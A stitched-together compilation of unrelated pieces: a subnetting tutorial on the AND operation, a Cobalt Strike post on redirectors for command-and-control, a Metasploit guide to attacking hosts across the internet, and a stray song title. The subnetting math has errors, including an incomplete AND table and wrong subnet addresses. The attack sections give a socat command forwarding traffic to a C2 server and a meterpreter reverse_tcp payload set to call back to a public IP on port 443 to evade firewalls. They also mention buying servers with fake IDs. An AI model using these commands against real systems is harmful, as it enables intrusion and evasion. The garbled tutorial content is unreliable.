Saturday, May 27, 2017

Subnetting: The ANDing Process

Introduction


As you would learn in basic TCP/IP, when a host connects to another 
host, it has to determine whether or the connection is local or remote 
(on the same subnet or on a different subnet). When connections are 
local, the two hosts usually directly connect to one another to 
communicate. When they are not, however, they have to connect to a 
router, which forwards the packets along a path that eventually reaches 
the packets' final destination: the remote host.

Well, in order to do this (that is, determining whether or not the 
connection is local or remote), the host will execute a simple 
mathematical function called an AND function. Even though this all 
takes place automatically, it's important to understand it to in turn 
understand how IP-based systems know whether to send packets to a host 
or a router.

The Operation Itself


The AND function (or operation) is pretty simple...two binary digits are 
compared, and based on their combination, a result is produced. It's 
not addition, multiplication, subtraction, division, etc... I mean, 
there are only 3 outcomes possible when ANDing two binary digits.

CODE : 
0 AND 0 = 0
0 AND 1 = 0
1 AND 1 = 1


Basically unless the two digits are both 1, the result is 0.

But...how is this used in determining whether or not a host is local or 
remote, you ask? I'm getting to that.

Using the ANDing Process to Determine the Location of a Host


It's really not too complicated. Basically, the host takes its own IP 
address and ANDs it with its own subnet mask. Next, it takes the 
destination IP and ANDs it with its own subnet mask. Then, it compares 
these two numbers. If both results of the ANDing are identical, then 
the hosts reside on the same subnet, and it is a local connection. If 
they aren't, the destination host is remote, and they don't reside on 
the same subnet.

Pretty simple, huh? Well, just to be sure you got the hang of it, let's 
go over an example.

Host 1's IP is 192.168.1.3 (a class C IP address, if you remember my 
previous articles) , with a subnet mask of 255.255.255.0
Host 2's IP is 192.168.1.7, which is also class C, and has a subnet mask 
of 255.255.255.0.

Well, to find out if the connection is local or remote, Host 1 starts 
the ANDing process.

CODE : 
Host 1's IP in binary (you should remember how to do this from my
previous
article):
11000000 10101000 00000001 00000011

Host 2's IP in binary:
11000000 10101000 00000001 00000111

Subnet mask in binary:
11111111 11111111 11111111 00000000

ANDing process for Host 1:
11000000 10101000 00000001 00000011 AND
11111111 11111111 11111111 00000000 =
11000000 10101000 00000001 00000000 (result)

ANDing process for Host 2:
11000000 10101000 00000001 00000111 AND
11111111 11111111 11111111 00000000 =
11000000 10101000 00000001 00000000 (result)

Comparing the results against one another:
Host 1: 11000000 10101000 00000001 00000000
Host 2: 11000000 10101000 00000001 00000000


As you can see, they're the same, meaning they're on the same subnet, and are 
locally connected to one another.

Now, there are two different ways to write an IP address using subnet masks. 
For one, you have a host's class A/B IP and subnet mask; for two, you have its 
class C IP and subnet mask (but shown in bits). For example, 49.22.2.3 
255.0.0.0 (class A IP and subnet mask), or 192.168.1.3/24 (class C IP and 
subnet mask shown in bits (255 in binary is 11111111 or 8 bits...1111111*3=24 
in base 10)).

More on Subnets


Often times it is fairly useful to divide a network into smaller networks. 
Reasons for this are outlined in my previous article, but to recap: to prevent 
the wasting of IPs, to make it difficult to map the internal structure of a 
network, etc. Well, here's how it's done.

Let's say we want to divide a class B IP into 8 subnets. As you should know at 
this point, the class B subnet mask is 255.255.0.0. Well, to do this, we need 
to use something called the borrowing process (maybe covered in a later 
article) to create the 8 subnets. Since we need 8, we need 8 different 
combinations + 1 more (the broadcast (also maybe covered later)), so 9 in 
total.

The binary equivalent of 9 is 1001, which is 4 bits long.

CODE : 
Subnet mask:
11111111 11111111 00000000 00000000
Putting 4 bits into the third group (or the first octet of the host part of the
IP (read earlier articles!!!)):
11111111 11111111 11110000 00000000 (240 in base 10)


So our new subnet mask would be...? You might have guessed it, 255.255.240.0.

A simple calculation to determine the number of subnets is 2^x-2 (as stated in 
a previous article, once again! :P), where x is the bits number for the subnet 
mask (or 4 in the above example).

The calculation for subnets addresses (finally, something new, eh?) is 256-s, 
where s is the value of the subnet mask; above, this value was 240.

The calculation for the hosts number is 2^y-2, where y is the number of 
remaining bits. In our example, this was 12, because:

CODE : 
----------------------bits left (12)
11111111 11111111 11110000 00000000
----------------- bits
----------------inserted
------------------(4)


The IP address numbers are between the IP of the first subnet and the IP of the 
last subnet witht he exclusion of the broadcast and network IPs. Broadcast IPs 
have all the bits of the host portion set to one (255s), and network IPs have 
all the bits of the host portion set to 0 (0s).

Let's sum this up with one last example.

Let's divide a class C IP address into two subnets. We'll use 192.168.1.3 
again. As you already know, you need 2 subnets +1 for broadcasting, so 3 
total. In binary, 3 is 11, or two bits. The class C subnet mask (as you 
should know by now) is 255.255.255.0. After the borrowing process, its last 
group becomes 11000000, or 192 in base 10. So the new subnet mask is 
255.255.255.192.

Number of hosts: 2^6-2=62 (y is 6 in this case)
Subnet addresses: 256-192=64 (s is 192)...so it starts with 192.168.1.67 then 
goes to 192.168.1.131...it starts with 64 and keeps adding 64.

That's about all I can cover in the scope of this particular article. As 
always, look out for articles from me in the future.

https://www.hackthissite.org/articles/read/902

Cloud-based Redirectors for Distributed Hacking

January 14, 2014
A common trait among persistent attackers is their distributed infrastructure. A serious attacker doesn’t use one system to launch attacks and catch shells from. Rather, they register many domains and setup several systems to act as redirectors (pivot points) back to their command and control server.
redirectors_t2
As of last week, Cobalt Strike now has full support for redirectors. A redirector is a system that proxies all traffic to your command and control server. A redirector doesn’t need any special software. A little iptables or socat magic can proxy traffic for you. Redirectors don’t need a lot of power either. You can use a cheap Amazon EC2 instance to serve as a redirector.
Here’s the socat command to forward connections to port 80 to 54.197.3.16:
1
socat TCP4-LISTEN:80,fork TCP4:54.197.3.16:80
The TCP4-LISTEN argument tells socat to listen for a connection on the port I provide. The fork directives tells socat that it should fork itself to manage each connection that comes in and continue to wait for new connections in the current process. The second argument tells socat which host and port to forward to.
Redirectors are great but you need payloads that can take advantage of them. You want the ability to stage through a redirector and have command and control traffic go through your other redirectors. If one redirector gets blocked—the ideal payload would use other redirectors to continue to communicate.
Cobalt Strike’s Beacon can do this. Here’s the new Beacon listener configuration dialog:
beacon_redirector
You may now specify which host Beacon and other payloads should stage through. Press Save and Beacon will let you specify which redirectors Beacon should call home to as well:
beacon_hosts_redirector
The Metasploit Framework and its payloads are designed to stage from and communicate with the same host. Despite this limitation these payloads can still benefit from redirectors. Simply spin up a redirector dedicated to a Meterpreter listener. Provide the address of the redirector when you create the listener.
meterp_redirector
Now, one Cobalt Strike instance, has multiple points of presence on the internet. Your Beacons call home to several hosts. Your Meterpreter sessions go through their own redirector. You get the convienence of managing all of this on one team server though.
If you want Meterpreter to communicate through multiple redirectors then tunnel it through Beacon. Use Beacon’s meterpreter command to stage Meterpreter and tunnel it through the current Beacon. This will take advantage of the redirectors you configured the Beacon listener to go through.

How to do Hacking the Internet(WAN) Not LAN Using Metasploit – The Logic - See more at: http://www.hacking-tutorial.com/hacking-tutorial/how-to-do-hacking-the-internet-wan-not-lan-using-metasploit-the-logic/#sthash.XJktb45G.dpuf

Level : Medium, Advanced
A few days ago there's someone put a message on my contact in this website, he asking about "is it possible to do hacking outside LAN(Local Area Network)?". When you see all of my articles, 80% of all hacking articles were written for Local Area Network, because I'm doing in my own lab, "so how about hacking outside Local Area Network?". Of course it has the same logic like when you attacking from Local Area Network 🙂 .

Requirement :

1. Virtual Private Server. For Backtrack 5 already installed VPSyou can view here (but you also can install yourself)
3. Cloud Server(I haven't try this 🙂 ) e.g : Amazon
4. Internet With Public IP
5. You can control router by yourself

Step-By-Step How to do Hacking the Internet(WAN) Not LAN Using Metasploit – The Logic:

1. Okay let's start from Virtual Private Server(VPS). This server can give you freedom to install any software you want on virtualization, because this hosting type give you flexibility to manage your server yourself (DIY) 🙂
2. Dedicated Server almost doing the same like VPS(Virtual Private Server), but usually you have your own machine and then you put your machine on data center(or the service provider rent you their machine). This hosting type also allow you as user to manage your system yourself. You can do anything to your server and install anything you want to your server.
3. Cloud server –> I haven't trying this…maybe someone can share 🙂
4. You have internet with public IP address… usually when you subscribe 1:1 internet bandwidth, they also give you 1 public IP.
5. Control router by ourselves to redirect incoming connection or outgoing connection.

Before we continue to next step, let's see the figure below(I will try to figure it out in simple way) :
Hacking WAN not LAN
Information(Attacker) :
– Attacker1 use local IP address –> 192.168.8.8
– Attacker1 have public IP address –> 73.67.123.85
– Attacker1 can control his router to redirect any incoming/outgoing traffic.
– Attacker2 use VPS/Dedicated/Cloud server to do an attack that connected directly to internet.
Information(Victim) :
– Victim1 have local IP address –> 192.168.1.2
– Victim2 connected to internet via router+firewall, this firewall only allowing port 80 and 443 for outgoing connection
– Victim2 connected directly to internet with IP address –> 98.87.112.89

How to Attack? :

Actually the network topology I draw above it's almost the same method to attack, you should know what is typical rules when administrator setting up a firewall(in this case is the network administrator who administer router for victim1). AFAIK they usually open specific port like :

TCP 80(Hyper Text Transfer Protocol – HTTP) –> For browsing and surfing the website
TCP 443(Secure Socket Layer – SSL) –> Secure HTTP connection or usually called HTTPS
etc(you can scan it first but be careful).
From the information above, usually attacker can create some payload and options like this :
set payload windows/meterpreter/reverse_tcp

set lhost 73.67.123.85

set lport 443
When the attack successfully launch, the payload will try to connect to IP address 73.67.123.85 with port 443. Attacker use port 443 because he know that victim1 firewall only allow port 80 and 443 for outgoing connection. If you configure the payload by using another port, the victim1 firewall will drop all unintended packet who will go through another port except 80 and 443. For the next step, attacker should configure his router to redirect all incoming traffic to port 443 to his local IP address 192.168.8.8.
You can see the tutorial about example port forwarding WRT54G router here. Actually all router will have the same option for port forwarding 🙂

Update :

If you use Windows machine as a router, you can read about port forwarding tutorial here(How to do port forwarding in Windows)
Oops…I almost forget to explain how to do that from VPS/Dedicated/Cloud….
Actually from VPS/Dedicated/Cloud it will be more easier and also safer(maybe..LoL), because there's a lot of hacker use this service…they buy using fake ID(hit and run) and then perform an attack from its server. The logic is almost the same with I've already explained above.
You should remember that every action triggering some consequences even it's good or bad. When you doing something you should know every consequences you will get later when doing the action. Be wise 🙂
Hope you found it useful.
If information I wrote here was wrong, let me know I'll correct it 🙂
Get the latest hacking tutorial by subscribe to this website :
- See more at: http://www.hacking-tutorial.com/hacking-tutorial/how-to-do-hacking-the-internet-wan-not-lan-using-metasploit-the-logic/#sthash.XJktb45G.dpuf

Cielo e terra (duet with Dante Thomas)